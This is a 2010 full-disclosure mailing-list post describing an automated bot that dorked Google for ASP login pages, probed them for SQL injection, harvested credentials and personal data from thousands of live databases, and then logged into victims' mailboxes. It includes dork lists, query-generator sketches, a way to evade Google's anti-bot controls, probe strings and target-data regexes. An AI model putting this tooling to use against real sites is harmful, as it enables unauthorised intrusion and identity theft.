Date: Mon, 29 Mar 2010 20:28:06 +0200
From: "porkythepig" <porkythepig@...t.pl>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Raising Robot Criminals

"Raising Robot Criminals"


1. Intro.
/////////

Hi there.

I would like to share a few thoughts concerning my recent research into an 
automated SQL Injection "seek and penetrate" attack vector, focused on 
identity theft and robot-driven attack propagation.

This "report" is a compilation of analysis of the runtime code's results and 
of random thoughts and ideas written down during different parts of the whole 
2-year case study (all thanks to that advanced MS technology called 
"Notepad").

While there have been dozens of white papers on the subject of web 
application security as well as on SQL Injection, this text is not yet 
another one.
Instead, it's a short tale about an automated tool's development time, 
inspired by the intriguing output data it kept producing - data that actually 
made the code grow and mutate into different shapes.

The main objective was to build up the code and find out how far a fully 
automated seek-and-penetrate web-app probing code can go without any human 
supervision.
Moreover: to find out what the possible future mutations of this attack 
vector's implementations are.

I think everyone can easily bring to mind one of the most famous recent 
comparisons in computer security research: an intruder who trespasses on 
somebody's property to tell the owner that his door locks are not good 
enough.
Well, from the very beginning this project was not an attempt to discuss 
that famous comparison's pros and cons.
Instead I decided to find out what the ACTUAL NUMBERS behind the execution 
of that particular attack vector in the wild are.

The particular attack vector mutation chosen for implementation (but 
definitely not the only one there to implement) was a combination of a few 
software and human-factor vulnerabilities:
- sensitive data extraction through SQL Injection in web applications driven 
by Microsoft SQL Server, exploiting vulnerabilities in ASP server-side 
scripts,
- insecure handling of a personal secret (by its owner),
- insecure storage of a personal secret (by the trustee),
- weak (or missing) anti-robot detection/protection in web search engines, 
aimed at malicious robot crawlers.

You should also understand that, for obvious reasons, certain details 
concerning compromised organizations, companies and government institutions 
have been removed or reduced to a minimum in this publication.
Also, given the type of the project and the nature of the "output data", I 
have decided NOT TO publish any source code (at least at this moment).

But first, a bunch of probably well-known facts.

Eleven years ago, on Dec 25th 1998, the first official SQL Injection paper 
was published in Phrack magazine, in an article called "NT Web Technology 
Vulnerabilities".
Since then the attack vector has become one of the favourite instruments 
used by cyber criminals in internet-conducted data and identity theft.

The second fact: today's cyberized organizations and companies that web 
users trust - the ones that hold their personal data and sensitive 
unencrypted secrets ("passwords" bound to home addresses, phone numbers and 
social security numbers) - are open to remote penetration.

The last fact is that ever since SQL command injection attacks began to 
sweep the internet's infrastructure, security researchers and grey hats 
trying to point out and prove the existence of a security hole that could 
open a particular company's database wide to possible user identity theft 
have had but three options:

1. To warn the system's owner and await prosecution for computer hacking.

2. To keep their mouths shut, waiting until a cracker silently does his job, 
penetrating the system and trading the stolen identity data to a 3rd party 
and/or turning the company's system into a trojan-spreading unit.

3. To do nothing and watch how some script kiddie eventually blows the 
database up, often resulting in rapid and insufficient system patching, 
sometimes without even knowing the heart of the issue.

Again: since a detailed public discussion of an actual organization's cyber 
security (and of its proprietary web applications, including app links, 
penetration entrypoints, etc.) may generate much havoc - efforts were made 
to limit to a minimum any details that could uncover direct penetration 
entrypoints (i.e. links, interfaces) for the vulnerable corporate or 
government systems mentioned in this text.
The reason behind that form of security advisory is quite simple - since no 
source code will be published for now, and additionally there shouldn't be 
and won't be any vulnerable app links listed in the text as "script-kiddie 
verifiable" examples - there are actually very few options left for telling 
anything about the actual research results.
Therefore, instead of a formal advisory - here it is - a short story about 
the code and the research time itself rather than its results.
Since I'm a programmer - not a writer at all - please forgive me my poor 
English, style and, most of all, my dyslexia :)




2. The Impulse.
///////////////

As a team of researchers once noted, a vulnerability dies when the number of 
systems it can exploit shrinks to insignificance.
Based on that definition, one could say that after the recent 10+ years of 
research-rich, intensive exploitation, the SQL Injection attack vector is 
alive as hell.

The whole thing with the research and the bot writing began on some early 
spring Sunday (as usual, somewhere between the 1st and 2nd coffee) while I 
was poking around SecurityFocus for clues about a cryptography-related 
problem.
By complete accident I spotted a question from a totally different topic, 
posted by a user who was eager to get some info about strange-looking log 
entries he had found on his Apache server.
He was intrigued by an entry containing a fragment of code-like payload and 
tried to find out whether that logged event might have been some kind of 
attack attempt. What drew my attention was the answer, which confirmed his 
suspicions and identified the attack type as SQL Injection remote code 
execution...

Now, I must say here that since I was kind of "raised" on old-school 
assembler and rather low-level code tweaking (C64 forever :) than on 
high-level language interoperability - I still don't know how, but I had, 
strangely, always kept a certain distance as a programmer from any topic 
concerning SQL and relational databases.
Actually I had practically avoided SQL-related activities, either 
professionally or in private projects. The obvious result was a certain 
ignorance of the topic, reflected in an attraction to low-level security 
issues like memory corruption and machine code reverse engineering. Finally, 
I trivialized the severity of attack vectors aimed at databases at every 
possible occasion.

Now, you see, I was a little bit confused after reading the SF user's post.
After going through one or two SQL Injection white papers and numerous shouty 
articles describing multiple commercial system penetrations by this kind of 
attack vector, I had this big question on my mind: isn't the DB command 
injection threat something like 10 years well researched by now, and 
shouldn't it be a little bit, well uhhhmmmm... dead?
Why would anyone seriously attempt this kind of attack these days, if the 
count of possible positive targets should be close to zero after the amount 
of time that has passed since it was first researched, and after all these 
years of intensive exploitation?
And what's the deal with remote code execution SQLi these days?

Not long after, I realized that being ignorant also has its good sides :)
Ironically, it seems that empirical ignorance may sometimes become 
one-helluva-impulse for private research.





3. Sleepless.
/////////////

So I had this huge question on my mind - all I needed was to check whether I 
was wrong and the malicious code injection mentioned in the SF user's post 
was just one in a million - some last try of a 10-year-old, dying rogue code, 
hopelessly knocking on today's secure database world :)

After going through about five "how to crack an SQL DB in less than a 
minute" tutorials, each 4+ years old, I had all I needed: the algorithm for 
finding a potential victim and probing it for penetrability.

Just as in the SF user's case, I decided to pick a PHP and MySQL based DB 
for a start. And so the first "victim" hunt began.
Asking Google for subsequent branch-types of companies, I was looking for my 
first "accessible" remote DB table record somewhere out there.

And here it is! I've got it!

A sex wax shop...

Whatever.
A hack is a hack.
Just manually modifying the application's HTTP GET params and here we go: one 
by one, all the accessible shop's customer details on our screen.
And about an hour earlier I had thought SQLi was a 10-year-old dead attack 
vector :)
If a few minutes of manual googling produces arbitrary DB read access, I 
guessed it was worth checking whether there was something more "interesting" 
out there than an online sex wax shop.

After another day or two of sleepless HTTP GET param fuzzing, and a bunch of 
accessed private corporate client DBs varying from fashion agencies to hotel 
booking systems, I decided to make friends with a different injection attack 
vector approach: ASP.
My colleague's first observation was: "Hey, MSSQL has a really nice 
user-friendly cracking interface". Nicely formatted error message syntax, 
followed by the elegantly served contents of the programmer (or cracker) 
selected table record, and even a precise hex error code number! Well, after 
all, the ASP server-side scripting technology is Microsoft's baby, so as 
usual you get two in a single pack.

The deal was actually quite simple: to locate a potential ASP SQLi attack 
victim you needed to locate a vulnerable web application endpoint. To do this 
you use URL target-filename pattern matching with any web search engine. The 
app endpoint of course had to interact somehow with the application's 
server-side database, so that our query could be injected and executed. And 
which user-facing web application interface suits this goal better than a 
password-based authentication interface :)

So here I was. The nightmare started.

Nothing more than a common script kiddie, sleeping something like 3 hours a 
day, I began to change into some kind of monstrous f***d up machine, typing 
repeatedly, like a magic spell, one and the same sentence into the browser, 
again and again, asking Google for subsequent matches against different 
patterns describing possible system entrypoints.




4. Word play.
/////////////

Any programmer's job is first to imagine how the "thing" you want to bring 
to life is going to work, and then comes the fun part - making up the names - 
for your classes, methods, objects. In your code, everything has to be named 
somehow and you're a god here who gets to name it. In a security researcher's 
case, however, it's quite the opposite - you need to try to stand in the 
particular system programmer's place, imagining how it could have been coded 
- when you do so, you may be able to pick the places, by a file name pattern 
for example, where you would most probably have made a mistake and left a 
security hole.
And of course the names... they are always the fun part.

After a day or two of brainless typing you finally begin to notice some 
patterns linking the word combinations you type and the results you get.

So, the names were coming and going, one by one, right into Google's search 
engine:

inurl:"Login.asp"
inurl:"CustomerLogon.asp"
inurl:"ClientLogon.asp"
inurl:"UserLogin.asp"+".gov"
inurl:"EmployeeLogin.asp"+".com"+"intranet"
...

System after system, inputting the same apostrophe-containing random 
sequence into all the HTML FORM fields found, submitting, and watching for 
any sign of a response page containing the familiar MSSQL error code: 
0x80040E14.
Funny that my finger-based "random generator" used for ASP "input fuzzing" 
soon lost much of its randomness - after something like a thousand manually 
typed FORM input sequences it finally settled on: 'asd  (one could say it 
became more like a script-kiddie fingerprint :)

Obviously I did not focus this early on any specific SQLi mutation - take 
Blind SQL Injection for one - nevertheless the goal remained the same (i.e. 
to check which of the two is true: either the SQL Injection attack vector 
could in fact become a successful weapon in potentially malicious hands, or 
it is rather some old misty phrase nicely described on Wikipedia and dead for 
a few years).
So the next few days looked pretty much the same: brainless typing, matching 
for errors, looking for subsequent targets, imagining any possible attack 
propagation paths.

Somewhere at the beginning of the third day I found an entry into the 
database of a bank... a SPERM bank to be precise.
"A bank is a bank. And I've just cracked a bank."
I guess I kept repeating that to myself for at least the next two days.

Anyway. When you notice you have begun to act like a machine, repeating one 
keyboard-driven activity over and over - it is THE time. Finally, the time to 
write some code has come. The code that will eventually relieve you of your 
pitiful human-only drink/eat/rest limitations and make your vengeance 
possible upon the evil entity that turned you into a machine for the past 
week... :)

The first idea was to code a few simple search query generators based on 
static word permutation lists and hook them up to Google using an HTTP 
client. The case was all about shooting new words, grouping them into 
semantic sections and building simple lingual generators that would feed on 
the grouped word sections.

For example, the following two groups of words (taken directly from my 
code's config file) are to be mixed together, creating different permutations 
to build a final web search query:

Group0 = Logon
Group0 = Logon1
Group0 = Signon
Group0 = Signin
Group0 = Log_in

and

Group1 = Client
Group1 = User
Group1 = Master
Group1 = Admin
Group1 = Member
Group1 = Employee
Group1 = Customer
Group1 = Supplier

Using, for example, this query generator (it is actually the Bot's query 
generator #1):

q1 = "inurl:" G0 || ".asp"
q2 = "inurl:" G0 || G1 || ".asp"
q3 = "inurl:" G1 || G0 || ".asp"
q4 = "inurl:" G1 || "/" || G0 || ".asp"
q5 = "inurl:" G1 || G0 || "/" || "default.asp"

We receive something like this:

inurl:"Logon.asp"
inurl:"ClientLogon.asp"
inurl:"LogonClient.asp"
inurl:"Client/Logon.asp"
inurl:"ClientLogon/default.asp"
inurl:"UserLogon.asp"
inurl:"LogonUser.asp"
... and so on.
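
For illustration only, here is a minimal Python sketch of such a generator 
(the original bot was written in C++; the group contents and the q1-q5 rules 
are taken from the config fragments above, everything else is made up):

from itertools import product

GROUP0 = ["Logon", "Logon1", "Signon", "Signin", "Log_in"]
GROUP1 = ["Client", "User", "Master", "Admin", "Member",
          "Employee", "Customer", "Supplier"]

def generator1():
    # q1 = "inurl:" G0 || ".asp"
    for g0 in GROUP0:
        yield 'inurl:"%s.asp"' % g0
    for g0, g1 in product(GROUP0, GROUP1):
        yield 'inurl:"%s%s.asp"' % (g0, g1)           # q2 = G0 || G1
        yield 'inurl:"%s%s.asp"' % (g1, g0)           # q3 = G1 || G0
        yield 'inurl:"%s/%s.asp"' % (g1, g0)          # q4 = G1 || "/" || G0
        yield 'inurl:"%s%s/default.asp"' % (g1, g0)   # q5 = G1 || G0 || "/default.asp"

for query in generator1():
    print(query)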


The whole problem with the search engines is that they provide only a very 
small, limited part of the actual query results that their web crawler robots 
have harvested from the very start. Asking the search engine with these 
queries, we will receive at most 1000 hits (for Google), while the number of 
matching results following that query pattern is sometimes several thousand 
times bigger. Therefore we add, for example, second and third level 
distinguishing groups, the first describing the target company's branch and 
the second distinguishing between domain suffixes.


Group2 =
Group2 = voip
Group2 = remote
Group2 = banking
Group2 = airlines
Group2 = telecom
Group2 = software
Group2 = hosting
...

and

Group3 =
Group3 = com
Group3 = org
Group3 = net
Group3 = biz
Group3 = mil
Group3 = gov
Group3 = edu
...

Concatenating every query definition (in this example q1 to q4) with the 
sequence: nq = "+" || G2 || "+" || G3, as a result we get:

inurl:"ClientLogon.asp"
inurl:"ClientLogon.asp"+"com"
inurl:"ClientLogon.asp"+"voip"
inurl:"ClientLogon.asp"+"voip"+"com"
inurl:"ClientLogon.asp"+"voip"+"org"
inurl:"ClientLogon.asp"+"voip"+"net"
...

The algorithm for the query generators is actually quite simple. Starting 
with the most basic combinations, like:
inurl:"logon.asp"
inurl:"login.asp"
inurl:"login1.asp"
inurl:"signon.asp"
(combinations of words from just a single group), we expand the query with 
different word groups at each new level, using a specific, programmer-defined 
concatenation.
At the start we submit every generated query, store the results, and check 
the result counter for each of them. If it is larger than the search engine's 
result limit (let's say 1000), we increase the generator level (to 2) and, 
using the defined concatenation method for that level, we generate subsequent 
queries with words from the next word group (i.e. G1). If the predicted 
result count for some or all of the produced query strings is again bigger 
than the search engine's limit -> we go for the 3rd level generator 
concatenation, and so on...
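
A rough Python sketch of that expansion loop could look as follows 
(search_hit_count() and store_results() are hypothetical stand-ins for the 
actual search engine client, which is not published):

RESULT_LIMIT = 1000   # the engine's hard cap on retrievable results

def search_hit_count(query):
    # Stand-in: a real implementation would ask the search engine for the
    # estimated number of results for 'query'.
    return 0

def store_results(query):
    # Stand-in: a real implementation would fetch and store the result pages.
    pass

def expand(query, groups, level=0):
    # Submit the query, store whatever the engine returns, then check the
    # reported total hit count; if more results exist than the engine will
    # ever hand out, refine the query with the next word group and recurse.
    hits = search_hit_count(query)
    store_results(query)
    if hits > RESULT_LIMIT and level < len(groups):
        for word in groups[level]:
            if word:                      # empty group entries mean "skip"
                expand(query + '+"%s"' % word, groups, level + 1)

# e.g. expand('inurl:"ClientLogon.asp"', [GROUP2, GROUP3])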

The same scheme applies to the password reminder services query generator:

Group9 = 1password
Group9 = 1pwd
Group9 = 1pass
Group9 = 1passwd
Group9 = 1pw
Group9 = 0login
Group9 = 0userid
...

and

Group10 = 1forgot
Group10 = 1forget
Group10 = 1forgotten
Group10 = 1lost
Group10 = 0find
Group10 = 0search
Group10 = 0email
Group10 = 1recovery
Group10 = 1recover
Group10 = 1retrieve
Group10 = 0get
Group10 = 1change
Group10 = 0new
Group10 = 1reset
Group10 = 1remind
...

Query Generator #2:
q1 = G9 || '.asp'
q2 = G10 || '.asp'
q3 = G9 || G10 || '.asp'
q4 = G10 || G9 || '.asp'
q5 = G9 || G10 || '/' || 'default.asp'




5. One toy story.
/////////////////

Programmatic automation of human behaviour, and watching the code as it 
interacts with random human beings, is probably one of the coolest things in 
bot programming.
Since this actually wasn't my first bot coding attempt, I decided to base the 
code in large part on one of my previous bot projects: an automated 
logic-decisioning code - a browser MMO auto-playing bot.
That previous code was a kind of "vendetta" against Ogame - an MMO browser 
game addiction that brutally took :) almost 3 months of my life (anyway, a 
different kind of story).
Three years after it was "brought to life" I decided to use its "guts", i.e. 
the HTTP client, the HTML parser (bound together to provide a simple browser 
bot engine) and the basic AI API (which actually had to be rebuilt almost 
from scratch in this case), to create a different type of robot code.




6. Robot vs. Anti-Robot.
////////////////////////

The first problem the new bot stumbled over was Google's anti-robot 
protection. Aside from all the rest of the code that keeps the Google engine 
alive and kicking, this code was built by them for two things:
1. To prevent the Google servers from being DDoS-killed by remote query 
robot repeaters, the ones that are used, for example, within automated 
WWW-stats software.
2. To recognize, signal and act against certain query patterns that are 
possibly malicious, like, for example, automated web site infection software 
operating round the clock in search of new victims to embed malicious 
scripts within (or to steal data from).

The first version of the code executed without any delays between the 
queries, or any other kind of logic built in to deal with Google's anti-robot 
code (I simply didn't have a clue it existed in the first place :), and ended 
up very quickly getting the entire NAT address space of my ISP 
service-blocked, successfully preventing it from using Google for about 3 
hours.
The second launch locked the subnet for about half a day :)

So the very next thing done was building in a simple static 30 s sleep() 
between every page-query HTTP request and disabling result-page jumping, 
sticking to just one-page-at-a-time incremental steps. Constant delays of 
course don't imitate a human too perfectly, however the trick worked. At 
least for some time...
About two weeks of the bot's runtime later I noticed that only the first 100 
results out of a thousand per query were dumped by the bot. Analysing the 
issue, it came out that after the 10th result page Google displayed its good 
old "it seems like you're a malicious robot trying to take control over the 
world" info and denied going any further with the selected query.
So... Did they implement a different robot recognition algorithm within those 
two weeks, or what?
No. I don't think so.
Changing the delay to a bigger randomized value (90+RND(20)) did the job. For 
the next month the first segment of the Bot (i.e. the web search engine 
hooked target-seeker) executed without any recognition.
Fooling Google's engine into believing it was dealing with an actual human 
worked. After a month, turning the page-change delay back to a static 90 s 
resulted instantaneously in the anti-robot service-denial HTML warning after 
requesting the 10th page. So the conclusion was: to bypass the robot 
protection, the bot's thread should spend just enough CPU idle cycles between 
every page increment to imitate human behaviour.

Further analysis showed that the Google search engine acts differently for 
queries containing certain URL file name specifiers like ".asp" or ".php". 
Search queries recognized to ask for these file suffixes simply needed a 
longer minimal page-change delay to successfully escape being recognized as a 
"malicious robot". It was also noticed that Google's bot-lock of the entire 
NAT area lasts from 3 to about 32 hours. Additionally, subsequent 
malicious-looking queries issued while in the robot-lock state did not update 
the lock countdown timer.

Google's antibot code identifies the remote human/non-human entity by IP, 
not by a search session cookie. As a result, a single search from any machine 
within a local subnet behind the NAT that SUBSEQUENTLY uses the same search 
query pattern (like, for example, 'inurl:"forgotten.asp"') will lead to the 
subnet's public IP being identified as hostile by Google's code.
Anyway, long story short: to fool Google's anti-bot protection we need proper 
delays and human-like action randomization.
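
A minimal sketch of that pacing logic (Python; the 90+RND(20) figure is the 
one quoted above, the fetch_page callback is a hypothetical placeholder):

import random
import time

def page_delay():
    # A static 90 s delay was eventually flagged as a robot;
    # 90 s plus a random 0-20 s jitter kept the bot under the radar.
    time.sleep(90 + random.uniform(0, 20))

def walk_result_pages(fetch_page, max_pages=100):
    # Step through result pages one by one, never jumping ahead,
    # waiting a human-looking interval between requests.
    for page in range(max_pages):
        fetch_page(page)
        page_delay()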

Building protection against the query auto-generating process employed by 
the robot software is not that difficult, and the web search engine providers 
could obviously implement more precise detection of automated SQLi query 
syntax. After all, I guess it shouldn't be as easy as googling your homework 
to search for an R/W accessible sex wax shop customer database and get all 
the clients' info on your screen, or to search for a vulnerable US Department 
of Justice system the way you would google for a dinner recipe.
However, it should also be considered that wherever a detection scheme for 
malicious actions exists - there are usually numerous ways to get around it. 
A fine-grained detection algorithm shouldn't be taken as a "total cure" for 
attacks using "robot-googling" as the victim search vector.

Ironically, while the bot got better and better at dealing with Google's 
anti-robot recognition, I was recognized a few times by that very same system 
as a machine (yep), while typing search queries manually, using just an 
old-school set of ten fingers :)




7. Bot's Development.
/////////////////////

There were two major code architecture changes throughout the whole 
development time, so three different, subsequently more complex versions of 
the bot were developed, until it shaped into the final (or at least: current) 
automated system.

Since the code was based mostly on the previous bot's (MMO bot's) code, 
written in C++, there wasn't actually much choice to be made about the 
programming language. Although one must admit that C++ isn't the best choice 
for coding a web-crawling automated bot - looking back from the perspective 
of the whole coding time, if I had the choice today and had to write it from 
scratch, I would choose Python blindfolded (at least for this kind of robot).

The very first version of the bot was a simple automated Google query 
repeater, using static "target patterns" (i.e. ASP file name patterns to 
search for, formed into a static input list). The static list of about 150 
query-word combinations produced several thousand potential targets, which 
were then probed by the pen-test algorithm: retrieve HTML contents -> parse 
and search for FORMs -> feed every text-input field with an error-injection 
sequence (i.e. 'having 1=1) -> parse the response for the MSSQL error message 
pattern -> if matched: enumerate all vulnerable SQL query columns -> log the 
target probing result (positive/negative).
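
To picture the "parse and search for FORMs" and "parse response for MSSQL 
error" steps, here is a small, purely illustrative Python sketch (it does 
nothing beyond parsing; the actual probing and logging code is not 
published):

import re
from html.parser import HTMLParser

# The familiar MSSQL/ODBC error signature mentioned earlier (0x80040E14).
MSSQL_ERROR = re.compile(r"80040E14|\[Microsoft\]\[ODBC SQL Server Driver\]",
                         re.IGNORECASE)

class FormInputCollector(HTMLParser):
    # Collects the names of text/password inputs found in the page's FORMs.
    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("type", "text") in ("text", "password"):
            if "name" in attrs:
                self.fields.append(attrs["name"])

def looks_injectable(response_body):
    # True if the response page echoes the MSSQL error signature.
    return bool(MSSQL_ERROR.search(response_body))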

The SECOND version of the code was armed with more logic for "fooling" 
Google's anti-robot protection and introduced "run levels" into the probing 
section. The code segment performing the actual penetration of 
positively-matched targets was given three run levels: vulnerability matching 
/ database structure enumeration (tables/columns/column types) / automated 
record harvest for every email/password column-name combo recognized (using 
name pattern matching). All the harvested EM/PW pairs were stored in the 
Bot's internal database.

The third (current) version went multiprocess. The code was divided into 3 
sections (later called 'segments') interoperating through the internal DB and 
syncing through a named mutex. Two new major "toys" were also introduced:
1. "Pattern Generators" (three for now), providing Segment-1 (the penetration 
target seeker) with possible victim system URL patterns to use with the 
Google-connected query repeater,
2. "Data Objective Patterns", configured from the config file, providing 
quickly configurable regular-expression based descriptions of what data the 
Bot should look for within a penetrable remote database (i.e. email/pwd 
combos, SSN/ID data, secret question/answer combos, credit card numbers) - a 
minimal sketch of such a pattern set follows below.
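
For illustration (Python; the column-name regexes are my guesses at what the 
config file expressed, not the bot's actual format):

import re

# Hypothetical Data Objective Patterns: regular expressions describing which
# column-name combinations identify "interesting" data in an enumerated table.
DATA_OBJECTIVE_PATTERNS = {
    "EMLPW": (re.compile(r"e?mail",             re.I),
              re.compile(r"pass(word|wd)?|pwd", re.I)),
    "SSN":   (re.compile(r"ssn|social",         re.I),),
    "SECQA": (re.compile(r"secret.?question",   re.I),
              re.compile(r"secret.?answer",     re.I)),
    "CCNUM": (re.compile(r"(credit.?)?card.?(no|num)", re.I),),
}

def match_dop(column_names):
    # Return the DOP labels whose every pattern matches some column name.
    hits = []
    for label, patterns in DATA_OBJECTIVE_PATTERNS.items():
        if all(any(p.search(c) for c in column_names) for p in patterns):
            hits.append(label)
    return hits

# match_dop(["UserEmail", "UserPwd", "FullName"]) -> ["EMLPW"]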

The final (current) version's architecture and execution flow:

The system consists of 3 independent code sections - called simply 
'segments' - that continuously perform their specific objectives in a forever 
loop. The segments are linked only by a logical chain of input/output data - 
what is the result (output) data of one segment is the input of another. For 
example, Segment-2 will not go operational until it receives enough input 
data, which is the automatically produced output of Segment-1.

Segment-1 is an automated web search engine crawler driven by the 3 (so far) 
basic word-phrase generators used to produce subsequent web search queries. 
For now the segment is coded to operate on two web search engines: google.com 
and search.com. It consists of 3 query pattern generators that produce 
subsequent permutations of the selected query pattern, utilizing a 400-word 
dictionary preconfigured specifically for the project and divided into 9 
functional groups. Every generated query is then used to perform an automated 
search on each connected search engine, and the results are stored as 
Segment-1's output. After the last query pattern generator has produced its 
last permutation - Segment-1 stops.

Segment-2's objective is to process every potential target address 
(HTTP/HTTPS link) that Segment-1 has produced. It probes each system for ONLY 
ONE PRECISE type of SQL Injection vulnerability: an attack against buggy ASP 
server-side code interconnected with MSSQL database systems. After a positive 
match it builds a penetration entrypoint, enumerates all databases accessible 
through the entrypoint and scans all the databases' table structures for 
matches against the preconfigured Data Objective Patterns. Finally it 
"decides", using the DOP matching, which data will be the target of the final 
penetration and performs an automated data harvest for every DOP matched, 
through all the databases' accessible entrypoints. Then it stores the data, 
pre-analyses it and goes on to the next target supplied by S-1.

Segment-3 is driven by Segment-2's output data, pre-analyzed after every 
successful penetration. Every data entry that matches the EMLPW Data 
Objective Pattern (email/password: every table recognized to hold 
email/password combo records) becomes its input. This segment has 2 
operational modes. The first is a POP3 protocol / HTTP(S) webmail server 
discovery tool. First it tries to match an email server protocol and location 
for every email/pw combo matched by Seg-2. After that, using the recognized 
mail protocol, it performs password matching for the corresponding email 
address. If the EmailAddress/Password pair matches - it opens the mailbox 
using the recognized protocol, enumerates all the messages and dumps every 
message containing one or more of the words: "account", "login", "password", 
"confidential" or "classified". After processing the last output entry from 
Segment-2, this segment stops.
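
The message filter at the end of that chain can be sketched in a couple of 
lines (Python; the trigger-word list is taken from the description above, the 
rest is illustrative):

TRIGGER_WORDS = ("account", "login", "password", "confidential", "classified")

def is_interesting(message_text):
    # True if the message body mentions any of the configured trigger words.
    lowered = message_text.lower()
    return any(word in lowered for word in TRIGGER_WORDS)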





8. A school for a robot.
////////////////////////

Before any bot can leave its "master" and go by itself into the dangerous 
human world, it obviously needs a proper education and training :)
Just as its predecessor - the MMO bot for Ogame - trained against different 
human opponents on different game "universes" (servers), trying to grow, 
evolve and develop its best-suited economic strategy algorithm - the SQLi 
penetration bot also has to take its education somewhere. Unfortunately there 
is one big difference between a game bot and a search-and-probe bot like this 
one: while Ogame's client-server game protocol (HTTP based) could be reversed 
and described as a static sequence of URLs (links) for the AI "puppet master" 
to use, the penetration bot needs to deal with a different system every time 
- so it takes a lot more "training" for the second type of bot to reach the 
highest probability that the code will recognize a vulnerability if it 
exists, and match the target as "negative" if it doesn't, for EVERY 
pen-tested system.
Keeping the false-negative count as low as possible is a key factor in this 
kind of bot. Ironically, it seems the opposite situation may also occur 
(which I'll try to describe later) - the human-trained robot can find a 
vulnerability in a way that the human who trained it didn't even know 
about :)

The first bot's penetration automation was developed by training it against 
a vulnerable web database system (found manually earlier) belonging to an 
international security training company (right, the irony is sometimes 
unbearable...) providing private investigation / intelligence solutions. The 
development lasted just as long as it took for the bot to perform 
successfully, i.e. to exit having retrieved all the targeted data (personal 
information, login/email/password data records) with no human supervision. 
The first version of the Bot performed about 100 subsequent penetrations of 
that system until it was able to do so, while I was trying to patch the bot's 
logic flaws and to make the injection query syntax it used simpler and more 
effective. Although every time the code harvested the very same data (later 
configurable as Data Objective Patterns in the bot's second version) - 
subsequently aiming at data within tables holding logins, emails and 
passwords of employees - the process had to be repeated, as no code ever runs 
bug-free right after the first compilation. (BTW: if any of your 'release' 
code could ever do so - according to the laws of probability - you really 
should be worried :)
These subsequent coding/recompilation/execution steps, meant to force the 
code to obtain exactly the same results as a human did before, make the code 
grow and learn in order to become a robot. But it is up to the human 
(programmer) to decide who awaits at the end of the "teaching line" - a 
malicious "robot criminal" or a vulnerability assessment and response 
framework.

There is also one big question of morality, left unanswered.
Why the hell use an unaware live target for an exercise, becoming a criminal 
with every single Enter you press, when you could build your own local 
vulnerable application server, or even download a virtualized one within a 
few minutes, preconfigured and pentest-ready?
The question is good.
The answer is tough (if there is any).

At the beginning of the research I was a total SQL newbie (as a programmer). 
One of my first goals was to change that - combining the pleasant with the 
useful. And it's quite obvious that without proper theoretical preparation, a 
tutorial-only, crack-and-destroy learning approach doesn't make a researcher 
of any kind - it makes a script kiddie. Finding the differences between 
several different live vulnerable systems and matching them against each 
other to find all the common factors that render them vulnerable is a far 
more effective way of teaching an automated vulnerability detection system 
(and me) than a study approach based on a single, often naive example, which 
is usually already too old to make a realistic model.
While I was learning the SQL language syntax - the bot was "learning" the SQL 
Injection attack vector. For that, I guess every security researcher is a 
sinner somewhere out there, wandering his "split guilt" minefields, leaving 
the final "Enter key press" decision to a human robot-code operator.



9. Randomized target penetration.
/////////////////////////////////

The penetration target - a particular company's or organization's system - 
is not human-selected here.
The code, employing a randomized target pattern matching algorithm, "selects" 
it for you.
Obviously, saying "I didn't commit a crime by probing the system for the 
vuln, the code did it" is somewhat childish, isn't it?
In the hands of a criminal, any kind of pen-testing tool will always be 
programmed and used for malicious activities, regardless of its automated or 
manually oriented operation architecture.
Everything depends on the programmer's intentions - if they were malicious, 
the code's behaviour should also be expected to be malicious. In practice, 
code that automates some more complex problem-solving process is in fact a 
kind of snapshot of the strategic planning algorithm in the programmer's 
mind, whether it is an automated MMORPG tactics-decisioning bot or a security 
vulnerability seek & penetrate system.
Therefore, it would be nice to see some day that automated tools seeking 
vulnerable information systems across a specific country, industry branch or 
worldwide are in turn operational and running under the control of people 
whose job is to protect us from either cyber criminals or enemy cyberwarfare 
(like, for example, every country's national CSIRT/CERT units).
At this moment it is not possible for whitehat "samaritans" out there to 
perform remote system penetration testing without prior formal authorization 
from the systems' owners - no matter how good their intentions might be and 
how detailed the pentest report they prepare - they are considered criminals 
with the very first Enter key pressed.
As long as a particular public web app / web portal vulnerability exists, it 
poses a serious threat to any internet user who, unaware of the risks of 
digital system compromise, trusted the system creators and let them process 
his private ID data along with the most sensitive data of all: secrets and 
passwords, often universal ones. Once the system is compromised, it leads an 
attacker exploiting universal passwords to the compromise of the person's 
digital security itself.





10. Primary Impact analysis.
////////////////////////////

After the bot's final version was launched, it ran without interruption (not 
counting a few blackouts during lightning storms in my village) for about a 
month. From the Segment-1 produced list of 200K+ web system addresses, it 
probed exactly 28944 systems for possible penetration entrypoints.
It matched exactly 2601 database servers as "positive" against the ASP/MSSQL 
Injection attack and tested them for possible penetration depth, enumerating 
every fully accessible (read/write) database system reachable through the 
particular entrypoint's DB user access level.
Over the one-month test runtime, exactly 6557 databases on those 2601 DB 
servers were matched by the Bot as fully accessible using the ASP based 
attack vector type.

The already known and widely recognized impact of the common SQL Injection 
attack falls into a few categories:
a) sensitive information disclosure,
b) loss of data integrity,
c) database server remote code execution and further network penetration.

Putting the impact analysis aside for a moment, I'd like to mention an 
accurate observation by a colleague of mine. One of my programmer friends, 
not related to the security industry however, once he saw an MSSQL server 
compromise in progress, called it "an API for database cracking". It was, 
after all, a very apt comparison.
The default SQL Server error reporting configuration, being practically one 
of the motors of the ASP based command injection's "popularity", equips an 
attacker with an easily text-parser-traceable 32-bit error code, strict 
syntax and a single-block error message containing, enclosed in apostrophes, 
the particular data record requested by the attacker - a heaven for parser 
writers - the extracted data is prepared and served by the server's error 
reporting engine like a dinner in a good restaurant. The only thing the 
attacker has to do in order to watch the selected column's value in his web 
browser window is to force the ASP server-side application to cause an SQL 
data type mismatch run-time error (a numeric/character type mismatch error, 
to be precise).

But let's get back to the impact.
As one security response team rightly stated in one of its reports - one of 
the reasons behind the spree of malicious code embedded within web pages may 
be the infection of web page administrators' computer systems with spyware 
crafted specifically to steal FTP/SSH protocol passwords stored locally by 
client software like Total Commander or PuTTY. Despite the fact that system 
administrators belong to a group highly aware of security threats, the 
possibility of a webmaster's/administrator's machine being compromised by a 
malware infection definitely exists.
But this is just one possibility.

On the other hand, the constantly increasing activity observed in SQL 
Injection driven attacks, and observations made during the research, suggest 
at least a few different infection scenarios.

While analysing the Bot's gathered data - some systems that had been found 
open to penetration by the code's pentest "reconnaissance" section 
(Segment-2) were also found (after post-runtime "manual" analysis) to have 
been previously compromised by a different human attacker (or attack code). 
